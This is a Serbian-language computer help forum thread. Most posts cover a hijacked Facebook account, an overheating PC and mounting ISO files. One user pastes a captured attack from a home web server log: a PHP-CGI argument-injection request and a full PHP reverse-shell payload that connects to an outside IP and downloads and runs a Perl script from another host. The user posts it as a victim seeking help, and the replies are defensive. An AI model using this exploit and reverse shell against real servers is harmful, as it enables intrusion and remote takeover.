Pitanja

[Moća]

Obrisao, cekirao disk preko cmd-a kaze da je sve u redu nema bad sectora tako da sam odahnuo sto se toga tice. Ali moram posle da odradim reinstal.

[katamaran]

Promena lozinke prvo. Onda odeš u podešavanja i pobrišeš sve alplikacije.

Pitanje, da li ima ikonicu fejsbuka na desktu, da li ima one razne tulbarove, facebook instant mesindžer ili nesto takvo?

Novi momenti.

 

Brisanje neke aplikacije je sprecilo prokletinju da spamuje taj neki link ali nastavlja da je ubacuje u grupe i posle brisanja svih aplikacija   A activity logu samo bude was added to random group by neki lik. Koliko ja vidim samo prijatelji mogu da te dodaju u grupe a ovi likovi joj nisu prijatelji. Totalno sam zbunjen. Moguce da ih nekako sprijatelji pa anfrenduje posle dodavanja u grupe. Al opet hebeno kako?

 

Poslednjih 24h se nije ni logovala na fejs tako da to nije neophodan uslov da bi je ubacivali u grupe.

 

Sve neke kretenske grupe sa Novog Zelanda. Uglavnom vezane za kola.

Edited August 29, 2014 by katamaran

[maheem]

Youtube mi posle 15ak minuta gasi računar?!
Ima li neko ideju šta može biti u pitanju?
Pregrejavanje neko pretpostavljam?

edit: desktop je u pitanju

Edited August 30, 2014 by maheem

[renne]

pregrejavanje, očisti vent na procu

[mei]

napalo mi http server kod kuće sa ovim 

POST /cgi-bin/php.cgi?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%64+%63%67%69%2E%66%6F%72%63%65%5F%72%65%64%69%72%65%63%74%3D%30+%2D%64+%63%67%69%2E%72%65%64%69%72%65%63%74%5F%73%74%61%74%75%73%5F%65%6E%76%3D%30+%2D%6E HTTP/1.1

što se dekodira u ovo

POST /cgi-bin/php.cgi?-d allow_url_include=on -d safe_mode=off -d suhosin.simulation=on -d disable_functions="" -d open_basedir=none -d auto_prepend_file=php://input -d cgi.force_redirect=0 -d cgi.redirect_status_env=0 -n HTTP/1.1

ovo su POST data, iz mog log-a:

 

2014-08-30 09:43:13-0400 [HTTPChannel,91,187.63.160.3] <?php
2014-08-30 09:43:13-0400 [HTTPChannel,91,187.63.160.3] set_time_limit(0);
2014-08-30 09:43:13-0400 [HTTPChannel,91,187.63.160.3] $ip = '91.121.105.21';
2014-08-30 09:43:13-0400 [HTTPChannel,91,187.63.160.3] $port = 22;
2014-08-30 09:43:13-0400 [HTTPChannel,91,187.63.160.3] $chunk_size = 1400;
2014-08-30 09:43:13-0400 [HTTPChannel,91,187.63.160.3] $write_a = null;
2014-08-30 09:43:13-0400 [HTTPChannel,91,187.63.160.3] $error_a = null;
2014-08-30 09:43:13-0400 [HTTPChannel,91,187.63.160.3] $shell = 'unset HISTFILE; unset HISTSIZE; uname -a; wget 208.85.177.238/speedtest/.a/hb/php01 -O /tmp/.bash_h1s7;perl /tmp/.bash_h1s7;rm -rf /tmp/.bash_h1s7';
2014-08-30 09:43:13-0400 [HTTPChannel,91,187.63.160.3] $daemon = 0;
2014-08-30 09:43:13-0400 [HTTPChannel,91,187.63.160.3] $debug = 0;
2014-08-30 09:43:13-0400 [HTTPChannel,91,187.63.160.3] if (function_exists('pcntl_fork')) {
2014-08-30 09:43:13-0400 [HTTPChannel,91,187.63.160.3]  $pid = pcntl_fork();    
2014-08-30 09:43:13-0400 [HTTPChannel,91,187.63.160.3]  if ($pid == -1) {
2014-08-30 09:43:13-0400 [HTTPChannel,91,187.63.160.3]          printit("ERROR: Can't fork");
2014-08-30 09:43:13-0400 [HTTPChannel,91,187.63.160.3]          exit(1);
2014-08-30 09:43:13-0400 [HTTPChannel,91,187.63.160.3]  }
2014-08-30 09:43:13-0400 [HTTPChannel,91,187.63.160.3]  if ($pid) {
2014-08-30 09:43:13-0400 [HTTPChannel,91,187.63.160.3]          exit(0);
2014-08-30 09:43:13-0400 [HTTPChannel,91,187.63.160.3]  }
2014-08-30 09:43:13-0400 [HTTPChannel,91,187.63.160.3]  if (posix_setsid() == -1) {
2014-08-30 09:43:13-0400 [HTTPChannel,91,187.63.160.3]          printit("Error: Can't setsid()");
2014-08-30 09:43:13-0400 [HTTPChannel,91,187.63.160.3]          exit(1);
2014-08-30 09:43:13-0400 [HTTPChannel,91,187.63.160.3]  }
2014-08-30 09:43:13-0400 [HTTPChannel,91,187.63.160.3]  $daemon = 1;
2014-08-30 09:43:13-0400 [HTTPChannel,91,187.63.160.3] } else {
2014-08-30 09:43:13-0400 [HTTPChannel,91,187.63.160.3]  printit("WARNING: Failed to daemonise.");
2014-08-30 09:43:13-0400 [HTTPChannel,91,187.63.160.3] }
2014-08-30 09:43:13-0400 [HTTPChannel,91,187.63.160.3] chdir("/");
2014-08-30 09:43:13-0400 [HTTPChannel,91,187.63.160.3] umask(0);
2014-08-30 09:43:13-0400 [HTTPChannel,91,187.63.160.3] $sock = fsockopen($ip, $port, $errno, $errstr, 30);
2014-08-30 09:43:13-0400 [HTTPChannel,91,187.63.160.3] if (!$sock) {
2014-08-30 09:43:13-0400 [HTTPChannel,91,187.63.160.3]  printit("$errstr ($errno)");
2014-08-30 09:43:13-0400 [HTTPChannel,91,187.63.160.3]  exit(1);
2014-08-30 09:43:13-0400 [HTTPChannel,91,187.63.160.3] }
2014-08-30 09:43:13-0400 [HTTPChannel,91,187.63.160.3] $descriptorspec = array(
2014-08-30 09:43:13-0400 [HTTPChannel,91,187.63.160.3]    0 => array("pipe", "r"),
2014-08-30 09:43:13-0400 [HTTPChannel,91,187.63.160.3]    1 => array("pipe", "w"),
2014-08-30 09:43:13-0400 [HTTPChannel,91,187.63.160.3]    2 => array("pipe", "w")
2014-08-30 09:43:13-0400 [HTTPChannel,91,187.63.160.3] );
2014-08-30 09:43:13-0400 [HTTPChannel,91,187.63.160.3] $process = proc_open($shell, $descriptorspec, $pipes);
2014-08-30 09:43:13-0400 [HTTPChannel,91,187.63.160.3] if (!is_resource($process)) {
2014-08-30 09:43:13-0400 [HTTPChannel,91,187.63.160.3]  printit("ERROR: Can't spawn shell");
2014-08-30 09:43:13-0400 [HTTPChannel,91,187.63.160.3]  exit(1);
2014-08-30 09:43:13-0400 [HTTPChannel,91,187.63.160.3] }
2014-08-30 09:43:13-0400 [HTTPChannel,91,187.63.160.3] stream_set_blocking($pipes[0], 0);
2014-08-30 09:43:13-0400 [HTTPChannel,91,187.63.160.3] stream_set_blocking($pipes[1], 0);
2014-08-30 09:43:13-0400 [HTTPChannel,91,187.63.160.3] stream_set_blocking($pipes[2], 0);
2014-08-30 09:43:13-0400 [HTTPChannel,91,187.63.160.3] stream_set_blocking($sock, 0);
2014-08-30 09:43:13-0400 [HTTPChannel,91,187.63.160.3] while (1) {
2014-08-30 09:43:13-0400 [HTTPChannel,91,187.63.160.3]  if (feof($sock)) {
2014-08-30 09:43:13-0400 [HTTPChannel,91,187.63.160.3]          printit("ERROR: Shell connection terminated");
2014-08-30 09:43:13-0400 [HTTPChannel,91,187.63.160.3]          break;
2014-08-30 09:43:13-0400 [HTTPChannel,91,187.63.160.3]  }
2014-08-30 09:43:13-0400 [HTTPChannel,91,187.63.160.3]  if (feof($pipes[1])) {
2014-08-30 09:43:13-0400 [HTTPChannel,91,187.63.160.3]          printit("ERROR: Shell process terminated");
2014-08-30 09:43:13-0400 [HTTPChannel,91,187.63.160.3]          break;
2014-08-30 09:43:13-0400 [HTTPChannel,91,187.63.160.3]  }
2014-08-30 09:43:13-0400 [HTTPChannel,91,187.63.160.3]  $read_a = array($sock, $pipes[1], $pipes[2]);
2014-08-30 09:43:13-0400 [HTTPChannel,91,187.63.160.3]  $num_changed_sockets = stream_select($read_a, $write_a, $error_a, null);
2014-08-30 09:43:13-0400 [HTTPChannel,91,187.63.160.3]  if (in_array($sock, $read_a)) {
2014-08-30 09:43:13-0400 [HTTPChannel,91,187.63.160.3]          if ($debug) printit("SOCK READ");
2014-08-30 09:43:13-0400 [HTTPChannel,91,187.63.160.3]          $input = fread($sock, $chunk_size);
2014-08-30 09:43:13-0400 [HTTPChannel,91,187.63.160.3]          if ($debug) printit("SOCK: $input");
2014-08-30 09:43:13-0400 [HTTPChannel,91,187.63.160.3]          fwrite($pipes[0], $input);
2014-08-30 09:43:13-0400 [HTTPChannel,91,187.63.160.3]  }
2014-08-30 09:43:13-0400 [HTTPChannel,91,187.63.160.3]  if (in_array($pipes[1], $read_a)) {
2014-08-30 09:43:13-0400 [HTTPChannel,91,187.63.160.3]          if ($debug) printit("STDOUT READ");
2014-08-30 09:43:13-0400 [HTTPChannel,91,187.63.160.3]          $input = fread($pipes[1], $chunk_size);
2014-08-30 09:43:13-0400 [HTTPChannel,91,187.63.160.3]          if ($debug) printit("STDOUT: $input");
2014-08-30 09:43:13-0400 [HTTPChannel,91,187.63.160.3]          fwrite($sock, $input);
2014-08-30 09:43:13-0400 [HTTPChannel,91,187.63.160.3]  }
2014-08-30 09:43:13-0400 [HTTPChannel,91,187.63.160.3]  if (in_array($pipes[2], $read_a)) {
2014-08-30 09:43:13-0400 [HTTPChannel,91,187.63.160.3]          if ($debug) printit("STDERR READ");
2014-08-30 09:43:13-0400 [HTTPChannel,91,187.63.160.3]          $input = fread($pipes[2], $chunk_size);
2014-08-30 09:43:13-0400 [HTTPChannel,91,187.63.160.3]          if ($debug) printit("STDERR: $input");
2014-08-30 09:43:13-0400 [HTTPChannel,91,187.63.160.3]          fwrite($sock, $input);
2014-08-30 09:43:13-0400 [HTTPChannel,91,187.63.160.3]  }
2014-08-30 09:43:13-0400 [HTTPChannel,91,187.63.160.3] }
2014-08-30 09:43:13-0400 [HTTPChannel,91,187.63.160.3] 
2014-08-30 09:43:13-0400 [HTTPChannel,91,187.63.160.3] fclose($sock);
2014-08-30 09:43:13-0400 [HTTPChannel,91,187.63.160.3] fclose($pipes[0]);
2014-08-30 09:43:13-0400 [HTTPChannel,91,187.63.160.3] fclose($pipes[1]);
2014-08-30 09:43:13-0400 [HTTPChannel,91,187.63.160.3] fclose($pipes[2]);
2014-08-30 09:43:13-0400 [HTTPChannel,91,187.63.160.3] proc_close($process);
2014-08-30 09:43:13-0400 [HTTPChannel,91,187.63.160.3] function printit ($string) {
2014-08-30 09:43:13-0400 [HTTPChannel,91,187.63.160.3]  if (!$daemon) {
2014-08-30 09:43:13-0400 [HTTPChannel,91,187.63.160.3]          print "$string
2014-08-30 09:43:13-0400 [HTTPChannel,91,187.63.160.3] ";
2014-08-30 09:43:13-0400 [HTTPChannel,91,187.63.160.3]  }
2014-08-30 09:43:13-0400 [HTTPChannel,91,187.63.160.3] }
2014-08-30 09:43:13-0400 [HTTPChannel,91,187.63.160.3] exit(1);
2014-08-30 09:43:13-0400 [HTTPChannel,91,187.63.160.3] ?>

kaj da radim sad, tj. šta da proveravam 

[djili]

mozda je samo bot, pogledaj sta ovi kazu, i related pitanja.

 

http://stackoverflow.com/questions/20576530/is-my-site-being-attacked-suhosin-simulation-very-strange-activity-in-ip-log

 

 

http://stackoverflow.com/questions/18008646/can-anyone-explain-this-php-code-injection-attack-to-me

Edited August 31, 2014 by djili

[katamaran]

Nastavljam istragu sekinog druzenja sa novozelandjanima 

 

Cela prica pocinje lajkovanjem nekog klipa na nekoj nasoj retardiranoj i nadasve seems legit stranici sa video klipovima. Ne bih da linkujem onu kretenariju od stranice... Tu je zet njenim nalogom lajkovao neki video da bi ga pogledao pa se navodno u pola posla setio da smo mu rekli da to ne radi pa je navodno odustao.

 

uglavnom njoj se tada pojavljuje likes a kretenski video on kretenskisajt.com i posle toga krece ubacivanje u NZ grupe i spamovanje 

 

 WATCH MOVIES FREE AND ENJOY nekisajtzastrimovanjefilmova.info

 

Utepavanjem aplikacija sprecio sam spamovanje ali u grupe i dalje upada. Jedino sada smanjenim intenzitetom od oko dve dnevno. Obrisao sam joj sve aplikacije i igre i cak iskljucio platformu sa aplikacijama ali nista ne pomaze

 

edit: kad sam guglao ono sto je spamovala pojavljuje se jos nasih ljudi koji to postuju tako da sam siguran da je ona stranica uzrok.

Edited August 31, 2014 by katamaran

[ToniAdams]

skino nesto sa kioksa, i sad u tom folderu izmedju ostalog imam 5 iso fajlova od 200-500 mb.

sta sad da radim?

[wall]

skino nesto sa kioksa, i sad u tom folderu izmedju ostalog imam 5 iso fajlova od 200-500 mb.

sta sad da radim?

Narežeš na CD.

[maheem]

pregrejavanje, očisti vent na procu

fala renne. učiniću to. danas radi ok al vreme mu je izgleda za penziju

[wall]

Narežeš na CD.

Edit: A ako ti ne treba na cd-ovima možeš raspakovati na disku... Ne znam šta je...

[katamaran]

Narežeš na CD.

so 19th century :)

 

instaliras virtualni drajv pa ga samo mountujes. Ucitas iso fajl i komp se ponasa kao da si ubacio disk sa tim podacima

[wall]

so 19th century :)

 

instaliras virtualni drajv pa ga samo mountujes. Ucitas iso fajl i komp se ponasa kao da si ubacio disk sa tim podacima

:)

Možda mu treba tako.

[Töölönlahti]

kaj da radim sad

Ne mogu sad da čitam kôd s moba, ali svakako updateuj PHP i nemoj da držiš više interpreter u /cgi/bin/.

[ToniAdams]

so 19th century :)

 

instaliras virtualni drajv pa ga samo mountujes. Ucitas iso fajl i komp se ponasa kao da si ubacio disk sa tim podacima

a cekaj, ubacim svih 5 ili je svaki zasebno?